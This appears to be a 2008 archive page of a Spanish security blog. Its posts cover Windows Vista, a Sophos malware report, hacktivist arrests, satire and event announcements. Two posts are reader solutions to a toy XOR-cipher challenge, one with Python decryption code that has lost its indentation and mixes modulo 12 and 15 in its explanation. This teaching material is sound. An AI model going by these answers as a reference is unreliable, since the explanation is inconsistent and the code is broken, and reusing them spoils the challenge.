Desde que Microsoft anunciara la aparición de Windows Vista y la progresiva desaparición de Windows XP los competidores han visto una nueva oportunidad de intentar derrocar al rey. Con Windows XP, pese a que Gardner pronosticara que su penetración en el mercado iba a ser muy poca ya que la versión anterior, Windows 2000 profesional, era mucho mejor, la guerra estaba perdida. La cuota de penetración de Windows XP a nivel mundial se situó sobre el 90 % quedando aún Windows 98, NT y Windows 2000 para llegar al 94 % de cuota de mercado en sistemas operativos de puesto de trabajo que alcanzó Microsoft.

Débil e Inseguro

Con Windows Vista había una nueva oportunidad, así que nada, manos a la obra. Primero acusaron a Vista de ser un sistema de Microsoft y, “como todo el mundo sabe” todos los sistemas de Microsoft son inseguros, son débiles. La realidad ha dejado a Vista con los mejores resultados en fallos de seguridad en el primer año de vida. Ya no es tan débil.

Después le acusaron de no dar compatibilidad hacia atrás, de tener mil pantallazos, de tener mil problemas. La realizad es que el sistema de firmado de drivers está funcionando muy bien y el número de pantallazos azules, o caídas del sistema, es infinitamente inferior que con cualquier otro Windows XP y la mayoría por forzar el uso de drivers no firmados y compatibles.

“Gordito”

La acusación de moda es decir que Vista es “gordito”, que consume mucha RAM y que no se mueve en ningún ordenador. Es curioso ver como los mismos que le acusan de esto presumen que otros sistemas operativos se pueden instalar en hardware que ya no se vende y que, para hacer la prueba de concepto habría que desempolvar el ordenador de cuando yo estudié en la universidad (y os recuerdo que yo estudié X.25 en lugar de TCP/IP).

Sin embargo, sí es cierto, que para soluciones empotradas es necesario contar con un sistema modulable y configurable que permita sacar el máximo rendimiento del hardware con la mayor eficiencia posible. Microsoft ha dispuesto para esto siempre de soluciones modulares y empotrables del sistema operativo. Estas versiones en Windows Vista se reciben el nombre de “Windows Vista Business for Embedded Systems” y “Windows Vista Ultimate for Embedded Systems”.

Los fabricantes, gracias estas versiones, pueden decidir que módulos de los que se ofrecen en el sistema van a ir o no en el sistema. Si es sistema va a correr sobre un hardware muy concreto el sistema de Windows Vista puede ser totalmente ajustado para sacar el máximo rendimiento de ese hardware y ofreciendo una gran eficiencia. Así, pese a que a muchos les parezca mentira, el sistema operativo se ha podido instalar en unos bonitos gadgets profesionales.

Un ejemplo de esto es el Willcom D4 (WSO16H) que, en un dispositivo hardware de 8,4 centímetros de ancho, por 18,8 centímetros de largo y 2,6 centímetros de grosor incluye un microprocesador Centrino Atom Z520 a 1.33Ghz , una pantalla de 5 pulgadas sensible al tacto, un disco duro de 40GB, 1GB de memoria RAM, Bluetooth y WiFi y corre Vista. No, no es hardware antiguo, es un Vista corriendo sobre hardware nuevo, pero con limitaciones. En este caso el hardware está limitado por el consumo y el espacio y hace que Vista tenga que ajustarse a ese entorno. Ningún problema, se puede hacer.

Willcom D4
¿Y para el server?

Pues para el servidor, la versión “fea” la versión sin colorines ni flip 3D, la versión “Windows Server 2008 Core”. Esta versión permite cargar roles a un servidor Windows Server 2008 para que se pueda sacar el máximo rendimiento de aquellos servidores dedicados que van a ser administrados en remoto. Por ejemplo, un DNS que sólo corra el DNS sin tan siquiera el entorno gráfico o la consola de administración del DNS. La verdad, entre nosotros, se hace un poco raro llegar a un Windows y encontrarte sin “Windows” pero si lo que hay que hacer es adelgazar para pesar menos, pues entonces manos a la obra, ¡qué no se diga que uno no es capaz de hacer régimen y ser menos gordito! ¡La dieta del bikini que llega el verano!

Saludos Malignos!

***************************************************************************************
Artículo publicado en Windows TI Magazine Abril'08
***************************************************************************************

viernes, mayo 23, 2008

Co-Speaker

Este año cumple los cuarenta, es del atleti y da más guerra de lo que vale. Cureta, rubito y marinero. Es José Parada, el abuelo, el Padre parada, el que me llama jipi, melenas, apirolao o cebollo. El que me levanta de los hoteles por la mañana diciendo: "Vamos, jipi, levanta, que vamos a llegar tarde...". Es mi compañero, es mi Co-Speaker.

Juntos hemos dado varias vueltas a España (y a los bares) y siempre buscamos la forma de enganchar una charla juntitos una reunión para hablar de seguridad o comilona.

Todo empezó aquel día que lo recogí para irnos a Zaragoza. Era su primera charla como Evangelista y cantaba conmigo. Yo había recibido una rama de "hierbas medicinales" que llevaba en el maletero y que animaba el habitáculo del coche y junto a otro compañero de anzandas ibamos cantando "Llevame a los bares más oscuros", para que el abuelo, por aquél entonces, Don José, se fuera aclimatando a su nuevo trabajo. A las 4 de la mañana, bailando Sevillanas en un pub de mala muerte un martes José dijo: "Joder, éste es el trabajo de mi vida".

Y de ahí en adelante, las Giras Technet de Seguridad, los Security On Sites, los Security Days, los eventos de Lanzamiento, Simos, ferias varias, orgías, cachondeos, comunas, etc... Es habitual que muchos den la charla sólos, pero yo si puedo, siempre prefiero darlas con un amigo, y José Parada siempre es mi primer Co-Speaker.

Este año no habíamos tenido muchas oportunidades de participar juntos en cosas, pero habíamos estado en el Lanzamiento de Windows Server 2008 juntos con aquello de los "5 minutos", en Blackhat y el Hosting Day hablando de 2008 + 7 (que la suma acaba en 5 pero no rima).

Ahora, llegando el verano, vamos a tener la oportunidad de hacer varias cosas juntos, que nos echamos de menos. El día 27 de Mayo estará conmigo en Móstoles, así que los que vengáis (no hay que registrarse, es gratis) nos veréis a los dos. El día siguiente vamos a Valencia a dar una charlita que, sospechosamente, ha sido planificada el día antes de que comiencen los campeonatos del mundo de navegación en Valencia, dónde, curiosamente, el Padre Parada compite (¿es o no un pájaro?). Después estaremos juntos en la Formación Técnida de Auditoría y Seguridad Informática, dónde José Parada va a participar y después de eso... nos vamos a ¡Las Vegas!.

Defcon 16
Sí, hoy hemos recibido el mail que nos confirma que hemos sido seleccionados para ir a cantar a Las Vegas en la Defcon16 así que, siguiendo el consejo que nos dio un viejo, siempre procuramos "disfrutar estos momentos, que nunca sabes cuando se van a acabar".

Si vienes a algún sarao... nos vemos.

Saludos Malignos!

jueves, mayo 22, 2008

Cadenas Youtubianas

Hola amigos,

hace ya un par de meses que salí de casa de Londres con la maletita a cuestas para irme a Holanda, Argentina y luego vagabundear un poco por las Españas. Salí, dejando atrás a mi primo Laggy y el remake de Friends que tuvimos allí todos (en el que me tocó el papel de "la rubia"). No pudimos disfrutar de mucho tiempo juntos pues las obligaciones nos comían a todos, pero hay momentos geniales que nunca olvidaré. Algusnos de esos momentos geniales tuvieron a Youtube de por medio, porque, como decía mi primo Laggy: "Youtube es malo"

Sí, es malo, porque empiezas... y no terminas. Eso es lo que le falta al youporn o el pornotube, porque claro en ellos, empiezas... y acabas, mientras que con Youtube te enganchas con el documental de si el hombre estuvo en la luna o no y terminas partiendote la caja con algún monólogo.

Youtube tiene de todo, pero haría falta un cronómetro que dijera: "oye chaval, deja ya de ver tanto video tanto video, ¡cohone!, ¡qué te enganchas y no duermes y mañana tienes que ir a currar!"

También hay cosas malas, y cómo sabéis la Policía tiene ahora gente especialmente dedicada a investigar los delitos que allí se publicitan, o la FIA está comprobando al minuto si alguien pone una imagen del gran premio durante su ejecución porque era títpico que la salida estuviera colgada en youtube cuando aun los coches no habían hecho la primera parada.

Pero a mi, me hackean los videos, porque Youtube engancha. Hoy os voy a dejar, para olvidarnos de que los grandes pilares que sostienen este blog, a saber [Linux es Malo, Spectra es Bueno, los informáticos no follan y que mal está el mundo de la seguridad en la web] una cadena youtubiana.

Las cadenas youtuianas [Youtube chains] son ese conjunto de vídeos que hay que ver uno tras otro. Ves el primero y... luego el segundo...y ya tienes que ver el tercero... y.... así hasta el final. Las cadenas youtubianas empiezan siempre en un video con muy alto número de visitas que genera adicción y deja a la gente con ganas de más. La gente que se queda con ganas de más salta dentro de la cadena youtubiana a otro video que está relacionado y luego a otro...y a otro...

Hay cadenas youtubianas polimórficas, con más de un camino o cadenas youtubianas en espiral que hacen un recorrido cíclico de varias cadenas o las más peligrosas... las infinitas... ¡no caigas en esas!. Además, muchas son víricas... se contagian. Lo siento, sé que muchos quedaréis contagiados con ésta.

Hoy os dejo una cadena que saqué de Londres y no paro de repetirla.

¡¡ADVERTENCIA: NO EMPIECES LA CADENA SI TIENES ALGO QUE HACER EN TU VIDA!!!

Cadena Youtubiana Dragon Force

La historia comienza con el fantástico vídeo de los Dragon Force:

DragonForce - Through the Fire and Flames
La pregunta que surge es: "¿Será alguien capaz de tocar esto con el Guitar Heroes?":

El "gran" Conrad, con dos cohones
La pregunta que surge es: "¿Habrá más gente así?" y te encuentas con éste, del que soy fan absoluto.

El premio al fake!
Claro, muchos le acusan de ser un fake y él lo mejora aun más con su versión en guitarra eléctrica:

¿Yo un fake?. He perdido 3 minutos de mi vida aprendiendo a tocar esta canción con mi guitarra eléctrica. Es un crá!
Pero todavía quedan "incredulos" que no se creen que toque él pq se oye la musica total por detrás, así que....:

La letra es un pelín personal.. jaja
La explicación que da es genial: Mucha gente se pregunta como puedo tocar Dragon Force con la guitarra real, bien, por que soy un heroe de la guitarra...Soy Dios. Me parto con él.

Y así.... al infinto. Recuerda las palabras de mi primo Laggy: "Youtube es malo". Mantente alejado de las cadenas youtubianas.

Saludos Malignos!

miércoles, mayo 21, 2008

Una cada 5 segundos

Holas,

la gente de Sophos ha publicado un informe que recoge su visión del malware en los tres primeros meses del año 2008. Quiero recalcar que esta es su visión, pues en esto del malware hay mucha gente que ofrece visiones y datos distintos. Yo tengo la suerte de compartir de vez en cuando llamada de teléfono para hablar de la serie de Los Sopran, las últimas noticias del mundo rosa de la web y los comentarios más curiosos de las cagadas de seguridad con un amigo que sabe algo de Malware y me suele poner los pelos mucho más de punta con las últimas jugarretas que realizan los del malware y los datos que ellos ven desde su posición privilegiada.

No obstante, los datos siguen siendo para acojonar. El informe lo podéis descargar de la siguiente URL: sophos-threat-report-Q108.

Os resumo algunos datos que dan en este informe:

- Durante este periodo Sophos ha descubierto que una nueva página web es infectada por el malware cada 5 segundos. Esto hacen más de 15.000 páginas web al día. Tres veces más que durante el año 2007.

- Sophos descubrió una nueva página montada para campañas de Spam cada 3 segundos.

- El correo ha bajado la media de infección en este periodo de 1 correo infectado cada 909 mails recibios en 2007 se ha pasado a 1 cada 2500 en este periodo de 2008.

- Los cuerpos de seguridad se ponen las pilas deteniendo a gente. En Canada 17 personas que controlaban la botnet de zombies más grande descuiberta en Canada con casi 1 millon de equipos comprometidos. En Nueva Zelanza cogieron a otro por infectar 1.3 millones de máquinas con adware. [Y en España ya sabéis...]

- Cualquier web es buena para ser infectada, incluida la página dedicada de Trend Micro para análisis de malware que fue infectada varios días en el 2008.

- El malware se sigue encontrando por todo el mundo pero ha subido en los USA dónde se han encontrado casi la mitad de los sitios infectados.

- Correos que simulan ser enviados por equipos IT están siendo muy utilizados. [E incluso los que simulan ser actualizaciones de Windows como puso Tonio en un comentario]

Y la última que me encanta:

"Experts believe that the rise in webmail spam might be related to spammers having bypassed CAPTCHA techniques – a challenge response test used to determine that the
user is human."

Sí, los spammers se saltan el captcha, pero a mi cada dia me cuesta más. Dentro de poco serán humanos los que no se lo salten.

Saludos Malignos!

Las nuevas versiones siguen con código antiguo

Hola ciudadanos de Detroit en el near future,

No me extraña que tengamos tantos problemas con el supercop, si es que tiene menos updates de software que un oracle para los que no pagan. Sí amigos, parece mentira, pero es así, tras haberme chupado Robocop, Robocop II, Robocop la serie de Televisión (21 capítulos), Robocop la serie animada (12 capítulos), Robocop Prime Directives (4 películas de 90 minutos) llegué a Robocop 3 y la sorpresa fue mayuscula cuando descubro que, tras muchas modificaciones en el firmware en casi 35 horas de metraje...¡siguen con código de 8 bits como el que se vioque llevaba en Prime Directives!!!!

Robocop 3 con el Command.com
No puede ser, ¡si en Robocop 3 le han puesto un jetpack al estilo de Bobba Fett para que vuele y todo! Pues ya véis, sigue con código de 8 bits, así que seguro, seguro que lo han hecho los desarrolladores de Spectra.

PD: En la serie de animación parece que también lleva el mismo software.

Robocop Animated Series
Saludos Malignos!

martes, mayo 20, 2008

Un mundo feliz

Hace unos años un chaval de 15 años, armado con sus gafas de pasta y su camiseta de Linux, vino a la puerta del Teched para pedir hablar con alguien de seguridad en Microsoft y decirle que la seguridad en Windows era una mierda.

El chaval, allí postrado, se dio cuenta de que delante de 5.000 guiris, el sistema educativo español falla con el inglés pues fue incapaz de comunicarle esto a ninguno de los extranjeros. Cómo en otras muchas películas la casualidad hizo que mi amigo Ivan, saliera a fumar un cigarro y diera con él, trayéndomelo hasta mi para hablar de seguridad.

El pobre repetía las consignas una y otra vez, pero desconocía todo lo que fuera un poco de tecnología de seguridad. Al final, después de charlar un rato con él, le di mi email y me presté a pasarme a verle por su instituto y les enseñaba cosas de windows, para que pudiera conocerlo mejor windows antes de decir esas cosas.

Lo que me llama la atención es lo fácil que son metidas algunas ideas a los chavales, vendiéndoles una sociedad compleja como la nuestra con idéas simplitas dónde nadie se explica como algunas cosas van mal y dónde los cálculos económicos que se hacen en la gran mayoría de las explicaciones que se dan son dignos de un econosmita-less.

Lo que me llama la atención es que un chaval de 15 años sea capaz de capaz de plantarse delante de 5000 personas en una conferencia europea de Spectra a intentar convencernos de lo malo que es la seguridad de Windows o que un chaval le tire huevos a Steve Balmer en una conferencia pidiendo que devuelva el dinero de los contribuyente de Hungría.

¿Es que estamos todos locos y esta gente son los únicos que ven la realidad al estilo del salvaje en "Un mundo feliz"? ¿Es que no hay otros medios de defender sus ideas? ¿Es que son manipulados por alguien para hacer estas cosas? Yo creo que nunca pediría a nadie que tire un huevo a RMS o que le de dos hostias al campeón de los técnicoless (y mira que esto segundo me tienta hacerlo personalmente...) pero creo que en un sociedad compleja como la nuestra hay formas de debatir las ideas sin necesidad de estas acciones.

El software libre, por mucho que crea nuestro amigo de los huevos que va a permitir que reciba todo el dinero de los contribuyentes también es un negocio del que viven muchos profesionales, vendiendo servicios y, lo siento, el dinero va a salir de un epigrafe [compra de licencias] para ser contabilizado en otro [servicios]. Los profesionales de la informática que trabajan en el software libre también cobran y las compañías que distribuyen software libre no están dadas de alta como ONGs sino como empresas con ánimo de lucro que eligen un modelo de negocio distinto para competir con otras empresas con otros modelos de negocio. ¿Saldrá más barato? Habrá que verlo en cada caso mirando todos los aspectos. ¿Cubrirá mejor las necesidades? Habrá que verlo en cada caso. ¿Tendrá ventajas a medio/largo plazo? Habrá que verlo en cada caso.

Cuando una empresa, administración pública o persona decide comprar o utilizar un software concreto lo hace bajo su critierio y este suele ser muy complejo. Reducir la ecuación a "nos están robando" es una interpretación simplista de lo complejas que son las decisiones tecnológicas y un menosprecio del criterio de muchas, muchas, muchas personas que, tras mirar todas las aristas que tiene la toma de una decisión de ese estilo, deciden usar otro software distinto del que tú quieres.

Convéncenos de tu criterio que estoy loco por escucharte pero luego escucha tú.

Saludos Malignos!

Solucionario al MiniReto de Criptografía por NitRic

Hola Amigos,

Os dejo aquí otro solucionario al minireto propuesto por Ramió en la pregunta 20, en este caso, la solución de NitRic, un nuevo jugador ;)

Saludos Malignos!

Solucionario por NitRic

El texto que me dió es:

Aunque alguien piense que el pasillo se lo va a hacer su padre, es de caballeros reconocer que el Madrid es el justo campeón y que el Barsa ha hecho el ridículo. A un día del humillante pasillo del miércoles 7 de mayo de 2008. Saludos, un culé.

Lo resolví primero sacando la clave con la ayuda. Lo que hice fue antes que nada desencriptar el texto en base64 para obtener la tira de bits encriptada, particularme como dije, la de las palabras repetidas.

Luego separé los bits resultantes en 31 tiras, y cada tira (palabra) me quedó de 7 bytes, es decir de 56 bits.

Cada tira correspondería a cada palabra y desencriptadas (en conjunto) todas deberían ser iguales, por lo tanto, también debería ser igual el primer caracter de cada palabra.

Ahora bien, asumí que el primer bit de la clave es 1 (si no hubiese sido 1, luego al tener la clave completa, sólo tendría que invertir todos sus bits (1 => 0, 0 => 1)) e hice lo siguiente:

Dado que el primer bit de la tira de bits completa (o de la primera tira de bits) es 1, y al asumir que el primer bit de la clave es 1, entonces el bit de la clave cuyo índice es 56 módulo 12 (es decir, el bit de la clave que pasaría por el primer bit de la segunda aparicion de la palabra) debería ser 1 también. Entonces tengo (% = módulo):

clave[(56 * 0) % 12] = 1
clave[(56 * 1) % 12] = 1 también

luego como el primer bit de la tercera aparición de la palabra también es 1, entonces también:

clave[(56 * 3) % 12] = 1

En fin, generalizando esto, tendría para cada bit de la clave:

clave[(56 * i) % 15 ] = tira_de_bits[56 * i]

al probarlo me di cuenta que esto cubría los 15 bits de la clave, por lo que me animé a generalizarlo dentro de un for.

Una vez obtenida la clave, simplemente tuve que hacer el XOR final sobre el texto del reto, y me quedó el texto que aparece arriba.

Acá está el código en python que resuelve el problema (el texto final lo guarda en un archivo ya que al imprimirlo en pantalla no se ven los caracteres con tildes).

Código en python:

from base64 import *

def bin(n):
b = ""
while n != 0:
b += str(n % 2)
n /= 2
return "0" * (8 - len(b)) + b[::-1]

def s2b(s):
b = ""
for d in s:
b += bin(ord(d))
return b

def b2s(b):
s = ""
for i in xrange(0, len(b), 8):
d = b[i:i+8]
s += chr(int(d, 2))
return s

words64 = "/zht21EIFbiU4oJPuijc7ip33lELCqmG+IdPuTfN/DBy3lIUG7uc/YdMpibf5jVy3U0FCaGZ/YRTtzTF4zVxwlwXE6SZ/ptCpS7A4zZu004NFqSa4YpQvyvA4Cl/wVQIFqeF8JhKuivD/zht21EIFbiU4oJPuijc7ip33lELCqmG+IdPuTfN/DBy3lIUG7uc/YdMpibf5jVy3U0FCaGZ/YRTtzTF4zVxwlwXE6SZ/ptCpS7A4zZu004NFqSa4YpQvyvA4Cl/wVQIFqeF8JhKuivD/zht21EIFQ=="
wordsS = b64decode(words64)
wordsB = s2b(wordsS)

for irep in xrange(15):
s = wordsS[irep * len(wordsS) / 31:(irep+1) * len(wordsS) / 31]
print "%02d %s" % (irep, s2b(s))

key = [0] * 15
for i in xrange(15):
key[ (56 * i) % 15 ] = int(wordsB[56 * i])

text64 = "zixww0gBWqmZ9p5KsymM/zB73E4BWrmA9MtGumfc7ip33lELWruQsYdM9jHNrzg+2lwHH7rV4p4DpibI/TwyklgXWqyQsYhCtCbA4zxs3U5ECK2W/oVMtSLeryhr1x0BFui48I9RvyOM6io+11FEEL2G5YQDtSbB/zzt3B0dWrmA9MtGumfu7itt0x0MG+id9IhLuWfJ43ls21mJGb2Z/sUDl2fZ4Xl6X1xEHq2ZsYNWuy7A4zhwxlhECqmG+IdPuWfI6jU+31SNCKua/Y5Q9nCM6zw+31wdFeiR9MsR5neUoXlN01ERHqeGvctWuGfP+jX3nA=="
textS = b64decode(text64)
textB = s2b(textS)

plainB = ""
for i in xrange(len(textB)):
c = str( int(textB[i]) ^ key[i % 15] )
plainB += c

plainS = b2s(plainB)

f = open("solucion.txt", "w")
f.write(plainS)
f.close()

Saludos!

NitRic.

PD: a modo de acompañar la explicación, el programa imprime las primeras 15 tiras de bits de cada palabra encriptada (en conjunto). Por cierto, imprime las primeras 15 palabras encriptadas ya que las siguientes apariciones se repiten (la aparición cuyo índice 15 es igual a la primera aparición, la de índice 16 igual a la segunda, etc).

lunes, mayo 19, 2008

Seguridad en LDAP. Brónxtoles 27 de Mayo

Hola perr@s!!

el próximo día 27 de Mayo, en la Universidad Rey Juan Carlos, a las 5 de la tarde, en el Aulario III en la clase 005, en la ciudad que Dios guarde en su gloria de Brónxtolex, voy a dar una charlota de LDAP y sus cositas. Será de 1 hora y media más questions de duración en la que todos estáis invitados a venir.

Recordad, Brónxtolex es una ciudad dura, difícil, no al alcance de cualquiera, así que piénsatelo bien. Para celebrar esto, el mismo día habrá comilona a todo tren en un restaurente chino en la ilustre ciudad kapital del reino, es decir, Brónxtolex. Informado quedas ser.

Saludos Malignos!

Cons-pirados

Hola a todos!

Supongo que vosotros ya lo sabéis, que estáis en el mundo, pero un amigo de un primo del vecino del cuarto de la casa de una tipa que conozco porque viene a mis charlas me lo ha confirmado, y ella lo sabe de buena tinta porque se cepilla al conserje del portal dónde vive uno que trabaja en los cuerpos de seguridad del estado: El gobierno americano tiene la clave del bitlocker de Vista.

Sí, sí, seguro que te parece raro, pero es cierto, y además, me dice, que cuando apareció el bug aquel en Hotmail, si hombre, aquel en el cual se podría haber accedido a los mensajes de correo de otra cuenta. Sí, ese, pues no te lo vas a creer, pero resulta que en una conferencias, el último día, salieron de copas Steve "yasabesquien" y el Mayor McChicken "de la ene ese aaaa" y resulta que acabaron en un garito de malamuerte de esos. Ya sabes que yo soy de menteabierta, pero hay algunas cosas que ... no están bien, no señor, porque tu me dirás que es lo normal, que se vayan de conferencias y cenen y tal, pero acabar en un garito con el aspecto del BING (deberías ver los soprano) pues no está bien.

El caso es que entre copa y copa, se les fue yendo de las manos, y al final Steve "yasabesquien" le dijo a McPollo: "Sí, me dejas a la rubia de las tetas operadas yo te abro el hotmail de todos los usuarios del mundo". A lo cual el Mayor dijo: "Si me la dejas tú a mi te permito que troyanices todos los ordenadores del mundo".

Y luego claro, de esos polvos llegan estos lodos, porque lo que no se puede hacer es portarse mal. Pero lo que no sabes es que con el caso este del certificado del Debian, ha pasado más o menos lo mismo. Sí, resulta, que tengo un amigo que trabaja en Faunia, ahí, sí, dónde los pingüinos en Madrid. Y tu dirás... ¿y que tiene que ver eso? Pues resulta que la última vez que vinieron a la Intergalactic-Kree-Skrul-Linux-Conference, se fue Ian "yasabesquienquemevoyaSunaganarpasta" a hacerse unas fotos con los pingüinos para una de esas campañas que hacen en la revista "Pengüin", sí, esa que es como el Man pero para...bueno, que me lio, y a mi no me gusta que de criticar leches. El caso es que mi amigo, estaba con la real cagada de un pingüino cunando vio que un tipo marcial, de pelo bien cortadito, le daba un sobre al tal Ian y este le dijo algo así como: "esto te lo descifro yo en el próximo parche".

Así que, con un simple comentario (valga el juego de palabras) se arregló el asunto, y es que por lo visto, aunque tu no lo creas, habían descubierto que Bin Laden enviaba su clave PGP con Debian, sí, y no seré yo quien te lo diga, que luego dicen que yo digo muchas cosas, pero a mi me da, a mi me da, a mi me da... que ese del pelito corto y pinta de marcial era algún pez gordo de esos de los que disfrutan más con un jeep verde que una maruja con los programas de tarde.

Si es que somos marionetas en este mundo, totalmente dominados, y esperate y verás, que tengo un conocimiento que trabaja empaquetando regalos en el Toys'r us y me ha dicho que el autónomo que trae las cajas de la distribuidora de Sony de la PSP le ha comentado que el nuevo modelo viene con una microcamara para vigilar a la gente en sus casas.. Si es que ya lo decía yo, como la sopa de letras no hay nada.

Bueno, me voy, que tengo la empanadilla haciendo la mili en Móstoles y se me va a quemar el hijo en la sarten.

Saludos Malignos!

domingo, mayo 18, 2008

Solucionario al MiniReto de Criptografía por Bambú

Hola amig@s,

El minireto que nos planteó Jorge Ramió ha sido resuelto por cuatro jugadores que se llevarán 1 punto extra cada uno. Bambú, Oriol, evilteq y NitRic. Mañana os pondré el solucionario de NitRic y como va el campeonato 2008.

Saludos Malignos!

Solucionario por Bambú

1/ Calcular el tamanyo de la palabra repetida en el segundo criptograma.

#texto/31. -> 7.

2/ Observar que ese criptograma se repetia a partir del byte 105(creo).

Lo cual nos dice que la clave tambien se repite.

3/ Como el enunciado decia que el cifrado era de flujo pero no especificaste nada al respeto hize algunas suposiciones. Supuse que el texto claro(Rn) se cifraria con XOR con un "stream" de bytes clave(Kn) y que ese tambien podia ser ciclico.

El criptograma ciclico seria el siguiente :

(R1+K1) (R2+K2) .... (R7+K7) (R1+K8) (R2+K9) ... (Ra+Kn) (Rb+K1)
(Rc+K2) ... [[ a = n/7%7 ]]

// Cada () es un byte real del criptograma, compuesto por el XOR de dos bytes

Si n fuera multiplo de 7 estariamos observando un ciclo de n en el texto cifrado con lo cual queda descartado.

Haciendo autocorrelaciones con XOR obtendremos el tamanyo de la secuencia K cuando encontremos una cadena de 7 caracteres repetida indefinidamente; las K se anularian y solo obtendriamos una sucesion de R descorreladas :

(Rb+K1) (Rc+K2) ....
+(R1+K1) (R2+K2) ....
=(R1+Rb) (R2+Rc) .... (R7+Rh) (R1+Rb) (R2+Rc) ...

Lo cual obtenemos cuando hacemos la correlacion con 15 espacios de diferencia. Es decir la longitud de Kn es 15 [15*7=105] :-) i b=2.

I la secuencia que hemos obtenemos es :

(R1+R2) (R2+R3) (R3+R4) ... (R7+R1) (R1+R2) ..

Cuando llegamos aqui es cuando solo nos falta una informacion para solucionarlo todo, R1, y con el obtendremos R2, R3 y toda la palabra.

Haciendo un bruteforce con los 255 candidatos observamos directamente 'pasi???' como la solucion mas probable.

Con 'pasi???' obtenemos directamente Kn y con ellas conseguimos el mensaje original directamente.

Al talego o a por talegos

Ayer estalló por todas partes y en todos los lugares aparecieron los chavales de Doomlabs. Al final, depués de lo de Jazztel, de lo de izquierda unida y de miles de otros sitios les han cazado.

Al final, les han cazado. Era dificil que en algún sitio no se hubieran dejado una ip sin encubrir, una conexión en un log o un mail enviado por el sitio equivocado. Se habían prestado ya a hacer una entrevista para contar por qué lo hacían y era cuestión de tiempo que los trincaran.

Cuando a un grupo de chavales tan jovenes los trincan en una de estas me da bastante pena, pues, cuando te dedicas a esto sabes que todos, más o menos, andan en el límite de lo legal y lo ilegal, porque hay cosas que son dificiles de probar si no son en real. Al final, la mayoría somos "hijoputas pero poco", es decir, se enreda en real, pero sin llegar a hacer daño. No hacer el último clic.

Este grupo de chavales son hacktivistas, se dedican a reivindicar hechos a través de la seguridad informática y ahora se enfrentan a penas de entre 1 y 3 años. Si salen culpables, automáticamente se les van a cerrar muchas puertas en Seguridad Informática aunque seguramente se les abra alguna en empresas privadas, pero supongo que no es lo que más le importa a un grupo de hacktivistas.

No sólo las penas de cárcel se encuentran de por medio, están los daños y perjuicios que reclamarán las empresas afectadas. Esto puede ser mucha pasta y ya he visto como acaba esto en otros casos. Declararse insolvense, la multa que perdura, salarios mínimos.... una putada de cojones. Por suerte para ellos, un par son menores de edad y en este país para los menores hay leyes especiales y un tratamiento distinto.

No son los primeros, ya tuvimos el caso del hackeo del IRC Hispano, el caso de hacienda (dónde al final se salvó límpio), o la famosa operación Kronen dónde cogieron a un gurpo de chavales que se habían cepillado la web de la COPE, Telemadrid y Menéame (no te pierdas el debate). Sé que algunos de la operación Kronen leén este blog, así que, si nos contáis vuestra experiencia os lo agradeceré.

Personalmente creo que a estos grupos de chavales, que con 16 años ya despuntan en seguridad habría que acogerles en las empresas, en horarios de verano para que disfruten de su pasión. Nosotros el año pasado nos trajimos a Sirw2p, de 16 años entonces, para que jugara con nosotros durante 1 mes. El jugó con nosotros, nosotros aprendimos de él y fue muy divertido y por supuesto, nuestra idéa es repetir este verano con más gente que venga a jugar con nosotros.

Hay una frase que está metido en el refranero popular de este país: "La policía no es tonta". Pueden que funcione la burocracia de forma lenta, que no sean técnicamente tan potentes como algunos hackers o que tengan pocos recursos que destinar, pero... las brigadas tecnológicas trabajan y obtienen resultados.

Además, en todas las empresas tecnológicas siempre estamos buscando técnicos, así que, si te gusta esto... ¿por qué no ganarte la vida con ello en lugar de jugartela?. En vez de ir al talego, mejor a ganar unos talegos. ¿no?

Definiciones de Talego
Saludos Malignos!

sábado, mayo 17, 2008

Qué pelo más guay!

Hola tod@s,

hoy sábado, os voy a dejar otra recomendación para el Ocio en este día de Internet. Sí, hoy es el Día de Internet, así que estará lleno de "domingueros" por lo que vosotros, adictos al http, seres que conocéis la historía de la arroba, quien era Tanenbaum, Turing, Newman, no Paul, sino su hermano Von, Silver Surfer y que el Commodore 64 tenía un motor gráfico muy chulo, tenéis que dejar Internet.

Hoy no tenéis que conectaros así que, os tenéis que ir al teatro, y para los que estéis o vayáis a estar en Madrid, os voy a dejar una recomendación personal. La historía comenzó hace muchos años. En ese tiempo estaba impartiendo mi primer curso de seguridad informática. Era una formación para el INEM y yo estaba empezando a aprender cosillas. Allí, conocí a otro melenas de nombre Chema, que me dijo: "te invito al teatro, que unos amigos mios tinen una obra de teatro muy chula".

Hipo
La obra en cuestión se llamaba "Hipo" y estaba hecha por los Sexpeare. Allí descubrí a Rulo y a Santiago haciendo de Sadisfaction y Ravon, trabajando en la tienda de Pollas y Pomas, dónde todo estaba en venta "menos esta polla, esta polla no se toca!". Al final, el objetivo, no era otro que la Dominación mundial (cómo el de Spectra) y la pildora para conseguirlo se la comía el polícia autónomo (el detective privado). Ellos se metían en el cuerpo de él, para sacarla (se metían completamente) y descubrían que dentro del cuerpo humano se habla en argentino. Al final el detective se convertía en Godzilla. Sí, no preguntéis, así son las obras de Rulo y Santiago.

Un mix de todo
El descojone fue tal, que ví la obra unas tres veces. Después me apunté a ver la obra de "Sexketchs", dónde hacían actos cortos de una auténtica paranoia y en la representación que asistí yo, actuaba su ex-compi Fele Martinez, pero la cosa fue increscendo cuando asistí a ver la obra de "Hache". Frikis, escritores, asesionos, el silencio de los corderos y su puta madre. De flipar.

Hache
Ahora, están reponiendo, y sólo por unos días más, la obra de "Qué Pelo más Guay", tiene ya muchos años, pero no la había visto. En ella Rulo hace de Eddie, un negro blanco, hijo de una madre racista, que entra con Frank a vender una maleta de coca en una antiuga peluquería abandonada. Antes de llegar tienen un accidente de coche porque Frank se encuentra con la aparición de Andy Warhold que le dice que "the beginning is the end". En esa peluquería el baño es una máquina del tiempo (¿os suena de algún juego?) y... la paranóia es total. Son Rulo y Santiago haciendo de Rulo y Santiago.

Qué Pelo más Guay!
"A ver, dónde estamos, ah, sí, Frank se acababa de meter en el baño. Esto..., no mejor, Frank acabada de entrar al baño... que lo otro es confuso..."

La semana que viene continuarán con "For Sale" la última obra que tienen estrenada este par de dos, pero ahora, al principio de la obra hacen un "trailer" de su próxima obra, que estrenarán a finales de año que se llama "El título de esta obra no es mi madre".

For Sale
Dios, es una rayada, pero no puedo dejar de flipar cada vez que los veo. Si te anima, sácate una entrada y vete al teatro. Están en el Alfíl.

Saludos Malignos!

No Lusers 45: Argentina

viernes, mayo 16, 2008

Aprendiendo

Lo reconozco, soy vocacional. Desde siempre he querido ser profesor. Disfruto enseñando, me da placer anímico. Poder transmitir algo me da tanta satisfacción como poder aprender algo nuevo. Es por eso que enfoqué mi vida profesional pensando en poder realizar esa faceta.

